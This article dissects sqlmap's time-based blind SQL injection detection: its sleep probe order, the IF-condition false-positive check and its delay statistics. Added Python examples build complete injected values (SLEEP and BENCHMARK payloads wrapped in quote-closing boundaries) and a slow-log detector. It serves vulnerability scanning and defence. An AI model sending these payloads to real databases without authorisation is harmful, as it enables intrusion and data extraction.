How to realize the Analysis of sqlmap time-based inject

2025-02-23 Update. From: SLTechnology News&Howtos, Network Security


Shulou(Shulou.com)05/31 Report--

This article explains the analysis of sqlmap's time-based injection in detail. The content is of high quality, so the editor is sharing it for reference; I hope you will have some understanding of the relevant knowledge after reading it.

1. Preface

How is sql injection detected?

My answer: on the first-party ("Party A", in-house) side, SQL injection testing is relatively easy to do.

1) Error-based injection: detect it directly from the error output.

2) Boolean-based blind injection: skip it, the false positive rate is relatively high.

3) Time-based blind injection: ask ops to enable the database slow query log and monitor it for the keywords sleep and benchmark. Put the scan task's ID into the decimal part of the sleep argument so that a hit in the slow log can be traced straight back to the task that produced it. (P.S. this method finds 99% of SQL injections.)

Therefore, when I do time-based injection, I constrain the timing tolerance very strictly. However, @chengable does security work on the vendor ("Party B") side, where time-based injection generally cannot be done this way. As I understand it, he mainly filters for candidate injection points and then runs sqlmapapi.py to detect them. I also tested with sqlmap earlier; the problems I ran into were too many false positives and long scan times. I then tried sqlmapapi.py, but its scan time was also too long and it did not support injecting into JSON bodies (details). Still, sqlmap's time-based injection is relatively accurate, so what if you want it without using sqlmapapi.py? This post pulls out the logic of sqlmap's time-based injection.
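The slow-log monitoring from item 3 of the preface, as an added example (not code from the original post or from sqlmap): it parses entries in the shape of a MySQL slow query log, flags statements containing sleep( or benchmark(, and recovers the scan task ID from the decimals of the sleep argument. The log text is constructed for the example, and the convention that SLEEP(5.0417) means "task 417" is an assumption about how the scanner encodes the ID.

```python
import re

# Constructed sample in the shape of a MySQL slow query log; the statements are
# made up for this example and are not taken from the original post.
SAMPLE_SLOW_LOG = """\
# Time: 2024-05-31T10:15:02.123456Z
# User@Host: app[app] @  [10.0.0.5]
# Query_time: 5.041700  Lock_time: 0.000100 Rows_sent: 1  Rows_examined: 1
SET timestamp=1717150502;
SELECT * FROM users WHERE id=1 AND (SELECT 1 FROM (SELECT(SLEEP(5.0417)))a);
# Time: 2024-05-31T10:15:08.000001Z
# User@Host: app[app] @  [10.0.0.6]
# Query_time: 12.309811  Lock_time: 0.000050 Rows_sent: 1  Rows_examined: 1000000
SET timestamp=1717150508;
SELECT count(*) FROM orders o JOIN items i ON o.id=i.order_id
WHERE o.created > '2024-01-01';
# Time: 2024-05-31T10:15:09.500000Z
# User@Host: app[app] @  [10.0.0.5]
# Query_time: 6.102233  Lock_time: 0.000090 Rows_sent: 0  Rows_examined: 1
SET timestamp=1717150509;
SELECT * FROM users WHERE name='x' AND BENCHMARK(5000000,MD5(1)) AND 'a'='a';
"""

_TIME = re.compile(r"^# Time: (\S+)")
_HOST = re.compile(r"^# User@Host: (.+)")
_QUERY_TIME = re.compile(r"^# Query_time: ([\d.]+)")
# The two keywords the post monitors for.
_KEYWORD = re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE)
# Assumed convention: the scanner encodes its task id in the fractional part
# of the sleep argument, e.g. SLEEP(5.0417) belongs to scan task 417.
_SLEEP_ARG = re.compile(r"\bsleep\s*\(\s*(\d+)(?:\.(\d+))?", re.IGNORECASE)


def iter_entries(log_text):
    """Yield one dict per slow-log entry: time, host, query_time, sql."""
    entry = None
    for line in log_text.splitlines():
        m = _TIME.match(line)
        if m:
            if entry is not None:
                yield entry
            entry = {"time": m.group(1), "host": "", "query_time": 0.0, "sql": ""}
            continue
        if entry is None:
            continue  # lines before the first "# Time:" header
        m = _QUERY_TIME.match(line)
        if m:
            entry["query_time"] = float(m.group(1))
            continue
        m = _HOST.match(line)
        if m:
            entry["host"] = m.group(1).strip()
            continue
        if line.startswith("#") or line.startswith("SET timestamp="):
            continue  # other header lines and the per-entry timestamp
        entry["sql"] += line.strip() + " "
    if entry is not None:
        yield entry


def task_id_from_sleep(sql):
    """Return the scan task id hidden in SLEEP()'s decimals, or None."""
    m = _SLEEP_ARG.search(sql)
    if m is None or m.group(2) is None:
        return None
    return int(m.group(2))


def find_injection_hits(log_text):
    """Entries whose statement contains sleep( or benchmark(; slow but
    ordinary queries (the 12 s JOIN above) are left alone."""
    hits = []
    for entry in iter_entries(log_text):
        m = _KEYWORD.search(entry["sql"])
        if m is None:
            continue
        hits.append({
            "time": entry["time"],
            "host": entry["host"],
            "query_time": entry["query_time"],
            "keyword": m.group(1).lower(),
            "task_id": task_id_from_sleep(entry["sql"]),
            "sql": entry["sql"].strip(),
        })
    return hits


if __name__ == "__main__":
    for hit in find_injection_hits(SAMPLE_SLOW_LOG):
        print("%(time)s %(host)s %(query_time).3fs %(keyword)s task=%(task_id)s\n  %(sql)s" % hit)
```

In practice the same matcher runs over the live slow log (tail or log shipper) rather than a string; the keyword match is what separates an injected delay from the database simply being slow, and the task ID is what lets you find the exact request that produced it.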

2. A Simple Analysis of sqlmap's time-based injection

A complaint first: sqlmap's code is irregular, ugly, and huge. A while ago a senior colleague recommended that I read the sqlmap source code to learn from it; now I think it is a good thing I gave up early.

So, being lazy and not wanting to read the source, I first ran sqlmap with --technique=T -v 3 to look at the detection payloads it sends.

Laziness turned out to reveal a few things, as can be seen from the screenshot:

First, sqlmap sends the sleep payloads: sleep(5) first, then, once that is seen to execute, sleep(0), and finally sleep(5) again.

So my guess at the check's general idea: send sleep(5); if a delay is observed, send sleep(0); if no delay is observed this time, send sleep(5) once more; if the delay occurs again, sqlmap reports that the parameter appears to be injectable:

Finally, and cleverly, to rule out false positives sqlmap adds a check built on an IF condition. In the figure above, sqlmap evaluates the equation twice, both times with an equation that does not hold, and decides whether the earlier delays were false positives by whether a delay still shows up on these requests.
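The probe sequence just described, as an added example (not sqlmap's code and not from the original post): the three sleep(5) / sleep(0) / sleep(5) requests, followed by the IF-condition check with equations that must and must not delay. The target is a constructed stand-in that returns a fake elapsed time, the toy SQL evaluator understands only the two payload shapes used here, and the delay judge is a simplified fixed threshold rather than sqlmap's statistical one. The "tarpit" target is the false-positive case the check exists for: something in front of the application stalls any request containing SLEEP(5, whatever the SQL would evaluate to.

```python
import random
import re

SLEEP_TIME = 5          # seconds, like sqlmap's default --time-sec
BASELINE = 0.2          # seconds a normal response takes on the fake target
TOLERANCE = 1.0         # how much of SLEEP_TIME may be lost to jitter


# Simplified MySQL-style payloads: a plain SLEEP(n), and the IF-conditional
# form where a true condition sleeps and a false one does not.
def sleep_payload(seconds):
    return "AND (SELECT 1 FROM (SELECT(SLEEP(%s)))x)" % seconds


def conditional_payload(a, b):
    return "AND (SELECT 1 FROM (SELECT(SLEEP(%d-(IF(%d=%d,0,%d)))))x)" % (
        SLEEP_TIME, a, b, SLEEP_TIME)


_COND = re.compile(r"SLEEP\(([\d.]+)-\(IF\((\d+)=(\d+),0,([\d.]+)\)\)\)")
_PLAIN = re.compile(r"SLEEP\(([\d.]+)\)")


def simulate_mysql_sleep(payload):
    """Seconds a MySQL backend would sleep for this payload (toy evaluator
    that understands only the two shapes above)."""
    m = _COND.search(payload)
    if m:
        total, a, b, penalty = m.group(1), m.group(2), m.group(3), m.group(4)
        return float(total) - (0.0 if a == b else float(penalty))
    m = _PLAIN.search(payload)
    return float(m.group(1)) if m else 0.0


def make_target(kind):
    """Constructed fake targets returning the seconds a request 'took'.
    'vulnerable' evaluates the SQL; 'safe' never does; 'tarpit' stalls on any
    request containing SLEEP(5 (think WAF or proxy timeout), regardless of
    what the SQL would evaluate to."""
    def request(payload):
        elapsed = BASELINE + random.uniform(-0.05, 0.05)
        if kind == "vulnerable":
            elapsed += simulate_mysql_sleep(payload)
        elif kind == "tarpit" and "SLEEP(%d" % SLEEP_TIME in payload:
            elapsed += SLEEP_TIME
        return elapsed
    return request


def delayed(elapsed):
    """Simplified stand-in for sqlmap's wasLastResponseDelayed(): a fixed
    threshold relative to the known baseline."""
    return elapsed - BASELINE >= SLEEP_TIME - TOLERANCE


def check_time_based(request):
    """The three probes from the screenshot: sleep(5), sleep(0), sleep(5)."""
    if not delayed(request(sleep_payload(SLEEP_TIME))):
        return False
    if delayed(request(sleep_payload(0))):
        return False  # delayed with no sleep at all: the delay is not ours
    return delayed(request(sleep_payload(SLEEP_TIME)))


def check_false_positives(request):
    """The IF-condition check: a true equation must delay, two false ones
    must not, and a second true one must delay again."""
    a, b, c = random.sample(range(1000, 9999), 3)
    if not delayed(request(conditional_payload(a, a))):
        return False
    if delayed(request(conditional_payload(a, c))):
        return False
    if delayed(request(conditional_payload(c, b))):
        return False
    return delayed(request(conditional_payload(b, b)))


def is_injectable(request):
    return check_time_based(request) and check_false_positives(request)


if __name__ == "__main__":
    for kind in ("vulnerable", "safe", "tarpit"):
        print("%-10s three-probe=%s  overall=%s" % (
            kind, check_time_based(make_target(kind)), is_injectable(make_target(kind))))
```

The tarpit target passes the three-probe step (sleep(0) does not stall it) and only fails on the IF-condition step, where a false equation still delays; that is the gap the extra check closes.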

3. An in-depth analysis of the source code

Back to the source code, going in by the keywords seen earlier. For example, the message "appears to be" printed above; searching for it leads to the code for the first step:

sqlmap/lib/controller/checks.py:

It is very close to the earlier guess.

Next, find where the payloads come from, especially the payload for the IF condition. Searching by keyword again leads here:

sqlmap/xml/payloads/time_blind.xml:

You can see that the payload for each IF-condition check is in the vector field.

4. Closing the context

Closing off the quoting or parenthesis context in front of the injection point is the key to whether the payload can be injected at all.

Looking at tools/sqlmap/xml/boundaries.xml, there are many closing variants, so we also need to refer to them here:
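How the vector field from time_blind.xml and the prefix/suffix pairs from boundaries.xml combine into a complete injected value, as an added example that is not sqlmap's own code or from the original post. The two XML snippets are abridged and constructed in the shape of those files (one MySQL SLEEP test, four boundaries); the composition rule (value + prefix + space + payload + suffix, with every occurrence of a marker replaced by the same random value) is an assumption that matches sqlmap's observable output, not a copy of its agent code.

```python
import random
import string
import xml.etree.ElementTree as ET

# Constructed, abridged snippets in the shape of sqlmap's xml/payloads/time_blind.xml
# and xml/boundaries.xml; not copied from the original post.
TIME_BLIND_XML = """<root>
<test>
    <title>MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)</title>
    <vector>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
    <request>
        <payload>AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
    </request>
    <response>
        <time>[SLEEPTIME]</time>
    </response>
</test>
</root>"""

BOUNDARIES_XML = """<root>
<boundary><prefix></prefix><suffix></suffix></boundary>
<boundary><prefix>'</prefix><suffix> AND '[RANDSTR]'='[RANDSTR]</suffix></boundary>
<boundary><prefix>')</prefix><suffix> AND ('[RANDSTR]'='[RANDSTR]</suffix></boundary>
<boundary><prefix>)</prefix><suffix> AND ([RANDNUM]=[RANDNUM]</suffix></boundary>
</root>"""


def load_tests(xml_text):
    """(title, detection payload, IF-condition vector) for each <test>."""
    root = ET.fromstring(xml_text)
    return [(t.findtext("title"), t.findtext("request/payload"), t.findtext("vector"))
            for t in root.iter("test")]


def load_boundaries(xml_text):
    """(prefix, suffix) pairs; empty elements come back as ''."""
    root = ET.fromstring(xml_text)
    return [(b.findtext("prefix") or "", b.findtext("suffix") or "")
            for b in root.iter("boundary")]


def fill_markers(template, sleeptime, inference=None, rnd=None):
    """Replace [SLEEPTIME], [RANDNUM], [RANDSTR] and, when given, [INFERENCE].
    Every occurrence of a marker gets the same value, so 'X'='X' in a suffix
    stays true."""
    rnd = rnd or random.Random()
    randnum = str(rnd.randint(1000, 9999))
    randstr = "".join(rnd.choice(string.ascii_letters) for _ in range(4))
    out = template.replace("[SLEEPTIME]", str(sleeptime))
    out = out.replace("[RANDNUM]", randnum).replace("[RANDSTR]", randstr)
    if inference is not None:
        out = out.replace("[INFERENCE]", inference)
    return out


def build_payloads(value, template, boundaries, sleeptime=5, inference=None, seed=0):
    """One complete injected parameter value per boundary:
    original value + prefix + ' ' + payload + suffix (the suffix carries its
    own leading space in the xml). Seeded so the output is reproducible."""
    rnd = random.Random(seed)
    out = []
    for prefix, suffix in boundaries:
        full = "%s%s %s%s" % (value, prefix, template, suffix)
        out.append(fill_markers(full, sleeptime, inference, rnd))
    return out


if __name__ == "__main__":
    title, payload, vector = load_tests(TIME_BLIND_XML)[0]
    bounds = load_boundaries(BOUNDARIES_XML)
    print(title)
    print("-- detection step (plain SLEEP) --")
    for p in build_payloads("1", payload, bounds):
        print(p)
    print("-- IF-condition step, condition false, so no delay expected --")
    for p in build_payloads("1", vector, bounds, inference="4713=1984"):
        print(p)
```

The detection step uses the test's plain payload; the false-positive step substitutes an equation into [INFERENCE] in the vector, and the boundary decides whether the whole thing lands inside a string, inside parentheses, or bare after a number.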

5. Determining whether a delay occurred

5.1 Method 1

Referring to how AWVS tests for injection, I came up with a detection method that is easier to understand. Send 6 normal requests without the injected payload, measure their elapsed times, and take the average as the original request time (ori_time).

When the injected payload is sleep(5), subtract ori_time from the elapsed time of the current request to get sleep_time. If sleep_time is less than 4, no delay is considered to have occurred. (The threshold is 4 seconds rather than 5 to allow for ori_time being inflated by network conditions.)

When the injected payload is sleep(0), compute sleep_time the same way. If sleep_time is greater than 2, the earlier delay is treated as a false alarm.

5.2 Method 2

If you look at the sqlmap code again, they use a math problem I don't understand (details).

Following the call chain Request.queryPage --> wasLastResponseDelayed, the logic is: take the elapsed times of 30 normal requests without the injected payload and put them into kb.responseTimes. The standard deviation of those 30 values is deviation, and from it the slowest acceptable normal response time, lowerStdLimit, is derived:

Its value is the average of the 30 times plus TIME_STDEV_COEFF * deviation. TIME_STDEV_COEFF is set to 7, which puts the judgment accuracy at 99.9999999440%.

Finally, it checks whether the elapsed time of the current request is greater than lowerStdLimit: if greater, a delay occurred; otherwise it did not. (In addition, when lowerStdLimit is less than 0.5 seconds, 0.5 seconds is used instead.)
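Both judgment methods side by side, as an added example (not the post's scanner and not sqlmap's code): method 1 with its average of 6 baseline requests and the fixed 4 s / 2 s thresholds, and method 2 with mean + 7 * stdev over 30 responses and the 0.5 s floor. The baseline samples are constructed; the "noisy" one has one slow request in five, which is the case where the two methods disagree. The standard deviation uses n-1, matching the doctest in sqlmap's own stdev() helper; that choice is an assumption about which estimator the reader wants rather than something the post states.

```python
import statistics

SLEEP_TIME = 5                    # the injected sleep(5)
TIME_STDEV_COEFF = 7              # sqlmap's settings.py value, as quoted in the post
MIN_VALID_DELAYED_RESPONSE = 0.5  # floor for lowerStdLimit, seconds

# Constructed baselines (seconds per normal request); not measurements from the post.
QUIET = [0.18, 0.20, 0.22, 0.19, 0.21] * 6   # 30 samples, tight
NOISY = [3.0, 0.20, 0.22, 0.19, 0.21] * 6    # 30 samples, one slow hit in five


# --- Method 1: average of 6 baseline requests, fixed thresholds ---

def ori_time(baseline6):
    return sum(baseline6) / len(baseline6)


def method1_delayed(elapsed, baseline6, threshold=4.0):
    """sleep(5) probe: delay only if the excess over ori_time is at least 4 s."""
    return elapsed - ori_time(baseline6) >= threshold


def method1_false_alarm(elapsed, baseline6, threshold=2.0):
    """sleep(0) probe: more than 2 s over ori_time means the delay was not ours."""
    return elapsed - ori_time(baseline6) > threshold


# --- Method 2: mean + TIME_STDEV_COEFF * stdev over 30 responses ---

def lower_std_limit(samples):
    """lowerStdLimit before the 0.5 s floor; stdev divides by n-1."""
    return statistics.mean(samples) + TIME_STDEV_COEFF * statistics.stdev(samples)


def method2_delayed(elapsed, samples):
    return elapsed >= max(MIN_VALID_DELAYED_RESPONSE, lower_std_limit(samples))


def compare(elapsed, samples):
    """Both verdicts for one measured response; method 1 sees only the first 6 samples."""
    return {"method1": method1_delayed(elapsed, samples[:6]),
            "method2": method2_delayed(elapsed, samples)}


if __name__ == "__main__":
    for name, samples in (("quiet", QUIET), ("noisy", NOISY)):
        print("%s baseline: ori_time=%.3f lowerStdLimit=%.3f" % (
            name, ori_time(samples[:6]), lower_std_limit(samples)))
        for elapsed in (0.25, 0.9, 5.5):
            print("  response %.2fs -> %s" % (elapsed, compare(elapsed, samples)))
```

On the quiet baseline lowerStdLimit is about 0.30 s, so the 0.5 s floor applies and a 0.9 s network hiccup already counts as delayed under method 2 (which is why the repeated sleep(5)/sleep(0)/sleep(5) probes from section 2 matter); under method 1 it does not. On the noisy baseline the limit climbs above 8 s, so a genuine 5.5 s sleep is missed by method 2 while method 1 still flags it; a baseline that noisy needs a longer sleep (--time-sec in sqlmap) for method 2 to work.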

Instinct tells me to choose method 1; reason tells me to choose method 2. I chose method 2 to test injection points (details), and it has scanned for injection vulnerabilities steadily.

This concludes the analysis of sqlmap's time-based injection. I hope the above content is helpful to you and that you learned something from it. If you think the article is good, share it so more people can see it.
